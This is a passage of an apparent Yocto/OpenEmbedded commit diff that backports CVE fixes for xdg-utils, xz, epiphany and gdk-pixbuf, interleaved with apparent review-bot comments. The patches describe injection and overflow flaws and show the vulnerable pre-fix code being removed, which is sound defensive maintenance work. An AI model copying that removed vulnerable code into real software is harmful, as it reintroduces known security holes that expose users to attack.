+CVE: CVE-2022-4055
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ scripts/xdg-email.in | 108 -------------------------------------------
+ 1 file changed, 108 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 13ba2d5..b700679 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -30,76 +30,8 @@ _USAGE
+
+ #@xdg-utils-common@
+
+-run_thunderbird()
+-{
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+- THUNDERBIRD="$1"
+- MAILTO=$(echo "$2" | sed 's/^mailto://')
+- echo "$MAILTO" | grep -qs "^?"
+- if [ "$?" = "0" ] ; then
+- MAILTO=$(echo "$MAILTO" | sed 's/^?//')
+- else
+- MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
+- fi
+-
+- MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
+- TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+- BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-
+- if [ -z "$TO" ] ; then
+- NEWMAILTO=
+- else
+- NEWMAILTO="to='$TO'"
+- fi
+- if [ -n "$CC" ] ; then
+- NEWMAILTO="${NEWMAILTO},cc='$CC'"
+- fi
+- if [ -n "$BCC" ] ; then
+- NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
+- fi
+- if [ -n "$SUBJECT" ] ; then
+- NEWMAILTO="${NEWMAILTO},$SUBJECT"
+- fi
+- if [ -n "$BODY" ] ; then
+- NEWMAILTO="${NEWMAILTO},$BODY"
+- fi
+-
+- NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+- "$THUNDERBIRD" -compose "$NEWMAILTO"
+- if [ $? -eq 0 ]; then
+- exit_success
+- else
+- exit_failure_operation_failed
+- fi
+-}
+-
+ open_kde()
+ {
+- if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
+- local kreadconfig=kreadconfig$KDE_SESSION_VERSION
+- else
+- local kreadconfig=kreadconfig
+- fi
+-
+- if which $kreadconfig >/dev/null 2>&1; then
+- local profile=$($kreadconfig --file emaildefaults \
+- --group Defaults --key Profile)
+- if [ -n "$profile" ]; then
+- local client=$($kreadconfig --file emaildefaults \
+- --group "PROFILE_$profile" \
+- --key EmailClient \
+- | cut -d ' ' -f 1)
+-
+- if echo "$client" | grep -Eq 'thunderbird|icedove'; then
+- run_thunderbird "$client" "$1"
+- fi
+- fi
+- fi
+-
+ local command
+ case "$KDE_SESSION_VERSION" in
+ '') command=kmailservice ;;
+@@ -130,15 +62,6 @@ open_kde()
+
+ open_gnome3()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -159,13 +82,6 @@ open_gnome3()
+
+ open_gnome()
+ {
+- local client
+- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -231,15 +147,6 @@ open_flatpak()
+
+ open_generic()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ xdg-open "$1"
+ local ret=$?
+
+@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do
+ shift
+ ;;
+
+- --attach)
+- if [ -z "$1" ] ; then
+- exit_failure_syntax "file argument missing for --attach option"
+- fi
+- check_input_file "$1"
+- file=`readlink -f "$1"` # Normalize path
+- if [ -z "$file" ] || [ ! -f "$file" ] ; then
+- exit_failure_file_missing "file '$1' does not exist"
+- fi
+-
+- url_encode "$file"
+- options="${options}attach=${result}&"
+- shift
+- ;;
+-
+ -*)
+ exit_failure_syntax "unexpected option '$parm'"
+ ;;
+--
+2.25.1
+
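Review bot: The last inner hunk removes the `--attach)` case from the option loop, so `xdg-email --attach FILE` now falls through to `-*)` and exits with "unexpected option", which will break existing callers. Any usage text or manual page that still documents `--attach` (not visible in this patch) would then be out of step. If the removal is intended, the patch description should say so, since it currently mentions only the Thunderbird support. The option loop continues outside the hunk.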
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..f6989430f5 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
file://0001-Reinstate-xdg-terminal.patch \
file://0001-Don-t-build-the-in-script-manual.patch \
+ file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
+ file://CVE-2022-4055.patch \
"
SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
index 6e43f5be6f..765a34e842 100644
--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
@@ -1,5 +1,6 @@
SUMMARY = "Socket-based service activation daemon"
HOMEPAGE = "https://github.com/xinetd-org/xinetd"
+DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things."
# xinetd is a BSD-like license
# Apple and Gentoo say BSD here.
@@ -12,7 +13,7 @@ PR = "r2"
# Blacklist a bogus tag in upstream check
UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)"
-SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \
+SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \
file://xinetd.init \
file://xinetd.conf \
file://xinetd.default \
diff --git a/meta/recipes-extended/xz/xz/CVE-2022-1271.patch b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
new file mode 100644
index 0000000000..7841a534d3
--- /dev/null
+++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
@@ -0,0 +1,96 @@
+From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Tue, 29 Mar 2022 19:19:12 +0300
+Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587).
+
+Malicious filenames can make xzgrep to write to arbitrary files
+or (with a GNU sed extension) lead to arbitrary code execution.
+
+xzgrep from XZ Utils versions up to and including 5.2.5 are
+affected. 5.3.1alpha and 5.3.2alpha are affected as well.
+This patch works for all of them.
+
+This bug was inherited from gzip's zgrep. gzip 1.12 includes
+a fix for zgrep.
+
+The issue with the old sed script is that with multiple newlines,
+the N-command will read the second line of input, then the
+s-commands will be skipped because it's not the end of the
+file yet, then a new sed cycle starts and the pattern space
+is printed and emptied. So only the last line or two get escaped.
+
+One way to fix this would be to read all lines into the pattern
+space first. However, the included fix is even simpler: All lines
+except the last line get a backslash appended at the end. To ensure
+that shell command substitution doesn't eat a possible trailing
+newline, a colon is appended to the filename before escaping.
+The colon is later used to separate the filename from the grep
+output so it is fine to add it here instead of a few lines later.
+
+The old code also wasn't POSIX compliant as it used \n in the
+replacement section of the s-command. Using \<newline> is the
+POSIX compatible method.
+
+LC_ALL=C was added to the two critical sed commands. POSIX sed
+manual recommends it when using sed to manipulate pathnames
+because in other locales invalid multibyte sequences might
+cause issues with some sed implementations. In case of GNU sed,
+these particular sed scripts wouldn't have such problems but some
+other scripts could have, see:
+
+ info '(sed)Locale Considerations'
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Thanks to Jim Meyering and Paul Eggert discussing the different
+ways to fix this and for coordinating the patch release schedule
+with gzip.
+
+Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ src/scripts/xzgrep.in | 20 ++++++++++++--------
+ 1 file changed, 12 insertions(+), 8 deletions(-)
+
+diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in
+index a1fd19c..da1e65b 100644
+--- a/src/scripts/xzgrep.in
++++ b/src/scripts/xzgrep.in
+@@ -178,22 +178,26 @@ for i; do
+ { test $# -eq 1 || test $no_filename -eq 1; }; then
+ eval "$grep"
+ else
++ # Append a colon so that the last character will never be a newline
++ # which would otherwise get lost in shell command substitution.
++ i="$i:"
++
++ # Escape & \ | and newlines only if such characters are present
++ # (speed optimization).
+ case $i in
+ (*'
+ '* | *'&'* | *'\'* | *'|'*)
+- i=$(printf '%s\n' "$i" |
+- sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
+- ');;
++ i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');;
+ esac
+- sed_script="s|^|$i:|"
++
++ # $i already ends with a colon so don't add it here.
++ sed_script="s|^|$i|"
+
+ # Fail if grep or sed fails.
+ r=$(
+ exec 4>&1
+- (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&-
++ (eval "$grep" 4>&-; echo $? >&4) 3>&- |
++ LC_ALL=C sed "$sed_script" >&3 4>&-
+ ) || r=2
+ exit $r
+ fi >&3 5>&-
diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb
index 1c4450a9e9..6d80a4f2e9 100644
--- a/meta/recipes-extended/xz/xz_5.2.4.bb
+++ b/meta/recipes-extended/xz/xz_5.2.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities for managing LZMA compressed files"
HOMEPAGE = "https://tukaani.org/xz/"
+DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils."
SECTION = "base"
# The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \
file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \
"
-SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz"
+SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \
+ file://CVE-2022-1271.patch \
+ "
SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6"
SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145"
UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb
index c00a932763..18b5d8648e 100644
--- a/meta/recipes-extended/zip/zip_3.0.bb
+++ b/meta/recipes-extended/zip/zip_3.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Compressor/archiver for creating and modifying .zip files"
HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
SECTION = "console/utils"
LICENSE = "BSD-3-Clause"
@@ -19,6 +20,12 @@ UPSTREAM_VERSION_UNKNOWN = "1"
SRC_URI[md5sum] = "7b74551e63f8ee6aab6fbc86676c0d37"
SRC_URI[sha256sum] = "f0e8bb1f9b7eb0b01285495a2699df3a4b766784c1765a8f1aeedf63c0806369"
+# Disputed and also Debian doesn't consider a vulnerability
+CVE_CHECK_WHITELIST += "CVE-2018-13410"
+
+# Not for zip but for smart contract implementation for it
+CVE_CHECK_WHITELIST += "CVE-2018-13684"
+
# zip.inc sets CFLAGS, but what Makefile actually uses is
# CFLAGS_NOOPT. It will also force -O3 optimization, overriding
# whatever we set.
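Review bot: Both new `CVE_CHECK_WHITELIST` entries are justified only by a one-line remark with no reference, so a later reader cannot check why the scanner result is suppressed. Put the source of each decision in the comment, for example `# Disputed; Debian security tracker does not treat it as a vulnerability: <link to tracker entry>`, with a similar pointer for CVE-2018-13684.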
diff --git a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
index ddb4c2794f..f43bfd6a67 100644
--- a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
+++ b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
@@ -1,4 +1,7 @@
SUMMARY = "WebKit based web browser for GNOME"
+DESCRIPTION = "Epiphany is an open source web browser for the Linux desktop environment. \
+It provides a simple and easy-to-use internet browsing experience."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Web"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany"
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -13,6 +16,7 @@ REQUIRED_DISTRO_FEATURES = "x11 opengl"
SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \
file://0002-help-meson.build-disable-the-use-of-yelp.patch \
+ file://CVE-2022-29536.patch \
"
SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b"
SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d"
diff --git a/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
new file mode 100644
index 0000000000..71cfc1238a
--- /dev/null
+++ b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
@@ -0,0 +1,46 @@
+CVE: CVE-2022-29536
+Upstream-Status: Backport [ https://gitlab.gnome.org/GNOME/epiphany/-/commit/486da133569ebfc436c959a7419565ab102e8525 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 486da133569ebfc436c959a7419565ab102e8525 Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@redhat.com>
+Date: Fri, 15 Apr 2022 18:09:46 -0500
+Subject: [PATCH] Fix memory corruption in ephy_string_shorten()
+
+This fixes a regression that I introduced in 232c613472b38ff0d0d97338f366024ddb9cd228.
+
+I got my browser stuck in a crash loop today while visiting a website
+with a page title greater than ephy-embed.c's MAX_TITLE_LENGTH, the only
+condition in which ephy_string_shorten() is ever used. Turns out this
+commit is wrong: an ellipses is a multibyte character (three bytes in
+UTF-8) and so we're writing past the end of the buffer when calling
+strcat() here. Ooops.
+
+Shame it took nearly four years to notice and correct this.
+
+Part-of: <https://gitlab.gnome.org/GNOME/epiphany/-/merge_requests/1106>
+---
+ lib/ephy-string.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ephy-string.c b/lib/ephy-string.c
+index 35a148ab32..8e524d52ca 100644
+--- a/lib/ephy-string.c
++++ b/lib/ephy-string.c
+@@ -114,11 +114,10 @@ ephy_string_shorten (char *str,
+ /* create string */
+ bytes = GPOINTER_TO_UINT (g_utf8_offset_to_pointer (str, target_length - 1) - str);
+
+- /* +1 for ellipsis, +1 for trailing NUL */
+- new_str = g_new (gchar, bytes + 1 + 1);
++ new_str = g_new (gchar, bytes + strlen ("…") + 1);
+
+ strncpy (new_str, str, bytes);
+- strcat (new_str, "…");
++ strncpy (new_str + bytes, "…", strlen ("…") + 1);
+
+ g_free (str);
+
+--
+GitLab
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
new file mode 100644
index 0000000000..3fef2bc1eb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
@@ -0,0 +1,55 @@
+From bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81 Mon Sep 17 00:00:00 2001
+From: Robert Ancell <robert.ancell@canonical.com>
+Date: Mon, 30 Nov 2020 12:26:12 +1300
+Subject: [PATCH 02/13] gif: Fix LZW decoder accepting invalid LZW code.
+
+The code value after a reset wasn't being validated, which means we would
+accept invalid codes. This could cause an infinite loop in the decoder.
+
+Fixes CVE-2020-29385
+
+Fixes https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/164
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81]
+CVE: CVE-2020-29385
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gdk-pixbuf/lzw.c | 13 +++++++------
+ 1 files changed, 7 insertions(+), 6 deletions(-)
+ create mode 100644 tests/test-images/fail/hang_114.gif
+
+diff --git a/gdk-pixbuf/lzw.c b/gdk-pixbuf/lzw.c
+index 9e052a6f7..105daf2b1 100644
+--- a/gdk-pixbuf/lzw.c
++++ b/gdk-pixbuf/lzw.c
+@@ -195,19 +195,20 @@ lzw_decoder_feed (LZWDecoder *self,
+ if (self->last_code != self->clear_code && self->code_table_size < MAX_CODES) {
+ if (self->code < self->code_table_size)
+ add_code (self, self->code);
+- else if (self->code == self->code_table_size)
++ else
+ add_code (self, self->last_code);
+- else {
+- /* Invalid code received - just stop here */
+- self->last_code = self->eoi_code;
+- return output_length;
+- }
+
+ /* When table is full increase code size */
+ if (self->code_table_size == (1 << self->code_size) && self->code_size < LZW_CODE_MAX)
+ self->code_size++;
+ }
+
++ /* Invalid code received - just stop here */
++ if (self->code >= self->code_table_size) {
++ self->last_code = self->eoi_code;
++ return output_length;
++ }
++
+ /* Convert codeword into indexes */
+ n_written += write_indexes (self, output + n_written, output_length - n_written);
+ }
+--
+2.25.1
+
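Review bot: The header's diffstat still lists `create mode 100644 tests/test-images/fail/hang_114.gif`, but the patch body contains only the `lzw.c` change, so the upstream regression image is not part of this backport. Either carry the test file separately or drop the stale `create mode` line and state in the header that the test data was omitted. `lzw_decoder_feed` starts and ends outside the hunk.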
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
new file mode 100644
index 0000000000..fe594b24bb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
@@ -0,0 +1,40 @@
+From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001
+From: Emmanuele Bassi <ebassi@gnome.org>
+Date: Wed, 1 Apr 2020 18:11:55 +0100
+Subject: [PATCH] Check the memset length argument
+
+Avoid overflows by using the checked multiplication macro for gsize.
+
+Fixes: #132
+
+Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]
+CVE: CVE-2021-20240
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index c9db3c66e..49674fd2e 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+
+ /* If no rendered frame, render the first frame */
+ if (anim->last_frame == NULL) {
++ gsize len = 0;
+ if (anim->last_frame_data == NULL)
+ anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height);
+ if (anim->last_frame_data == NULL)
+ return NULL;
+- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height);
++ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height))
++ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len);
++ else
++ return NULL;
+ composite_frame (anim, g_list_nth_data (anim->frames, 0));
+ }
+
+--
+GitLab
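Review bot: `Upstream-Status: Backported [...]` does not match the `Backport` spelling used by the other patches in this commit, and tooling that validates the tag may not recognise it. Change the line to `Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]`. The function body continues outside the hunk.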
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
new file mode 100644
index 0000000000..b29ab209ce
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
@@ -0,0 +1,61 @@
+From bdf3a2630c02a63803309cf0ad4b274234c814ce Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 9 Aug 2022 09:45:42 +0530
+Subject: [PATCH] CVE-2021-46829
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/5398f04d772f7f8baf5265715696ed88db0f0512]
+CVE: CVE-2021-46829
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index d742963..9544391 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -364,7 +364,7 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ for (i = 0; i < n_indexes; i++) {
+ guint8 index = index_buffer[i];
+ guint x, y;
+- int offset;
++ gsize offset;
+
+ if (index == frame->transparent_index)
+ continue;
+@@ -374,11 +374,13 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ if (x >= anim->width || y >= anim->height)
+ continue;
+
+- offset = y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + x * 4;
+- pixels[offset + 0] = frame->color_map[index * 3 + 0];
+- pixels[offset + 1] = frame->color_map[index * 3 + 1];
+- pixels[offset + 2] = frame->color_map[index * 3 + 2];
+- pixels[offset + 3] = 255;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, x * 4)) {
++ pixels[offset + 0] = frame->color_map[index * 3 + 0];
++ pixels[offset + 1] = frame->color_map[index * 3 + 1];
++ pixels[offset + 2] = frame->color_map[index * 3 + 2];
++ pixels[offset + 3] = 255;
++ }
+ }
+
+ out:
+@@ -443,8 +445,11 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+ x_end = MIN (anim->last_frame->x_offset + anim->last_frame->width, anim->width);
+ y_end = MIN (anim->last_frame->y_offset + anim->last_frame->height, anim->height);
+ for (y = anim->last_frame->y_offset; y < y_end; y++) {
+- guchar *line = pixels + y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + anim->last_frame->x_offset * 4;
+- memset (line, 0, (x_end - anim->last_frame->x_offset) * 4);
++ gsize offset;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, anim->last_frame->x_offset * 4)) {
++ memset (pixels + offset, 0, (x_end - anim->last_frame->x_offset) * 4);
++ }
+ }
+ break;
+ case GDK_PIXBUF_FRAME_REVERT:
+--
+2.25.1
+
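Review bot: In the second hunk the row offset is now overflow-checked, but the `memset` length `(x_end - anim->last_frame->x_offset) * 4` is still plain integer arithmetic. If `x_offset` can exceed `x_end` (the frame validation and the variable types are outside the hunk), the length goes negative and converts to a very large size. Adding `x_end > anim->last_frame->x_offset` to the condition guarding the `memset` would close that. The checked multiply/add also only detects `gsize` wrap-around, not whether `offset` lies inside the pixel buffer, so the existing bounds tests on `x` and `y` remain the real limit. Both functions continue outside the hunks.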
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
index 0405fa78b5..1171e6cc11 100644
--- a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
@@ -24,6 +24,9 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \
file://0004-Do-not-run-tests-when-building.patch \
file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \
file://missing-test-data.patch \
+ file://CVE-2020-29385.patch \
+ file://CVE-2021-20240.patch \
+ file://CVE-2021-46829.patch \
"
SRC_URI_append_class-target = " \
diff --git a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
index 3a2727b701..5503f225bb 100644
--- a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
+++ b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "GTK+ icon theme"
+DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop \
+This package package contains an icon theme for Gtk+ 3 applications."
HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues"
SECTION = "x11/gnome"
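Review bot: The new `DESCRIPTION` string has two typos that will appear in the package metadata: the first sentence has no full stop before the line continuation, and the second reads "This package package". Suggested text: `DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop. \` followed by `This package contains an icon theme for Gtk+ 3 applications."`.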
diff --git a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
index 92b0d1d52f..0842f10ea9 100644
--- a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
+++ b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
@@ -102,7 +102,7 @@ EOF
# from the target sysroot.
cat > ${B}/g-ir-scanner-wrapper << EOF
#!/bin/sh
-# This prevents g-ir-scanner from writing cache data to $HOME
+# This prevents g-ir-scanner from writing cache data to user's HOME dir
export GI_SCANNER_DISABLE_CACHE=1
g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@"
diff --git a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
index 0306b04f4e..6b59029255 100644
--- a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
+++ b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
@@ -1,4 +1,8 @@
SUMMARY = "Library for sending desktop notifications to a notification daemon"
+DESCRIPTION = "It sends desktop notifications to a notification daemon, as defined \
+in the Desktop Notifications spec. These notifications can be used to inform \
+the user about an event or display some form of information without getting \
+in the user's way."
HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues"
SECTION = "libs"
@@ -20,3 +24,6 @@ PROVIDES += "libnotify3"
RPROVIDES_${PN} += "libnotify3"
RCONFLICTS_${PN} += "libnotify3"
RREPLACES_${PN} += "libnotify3"
+
+# -7381 is specific to the NodeJS bindings
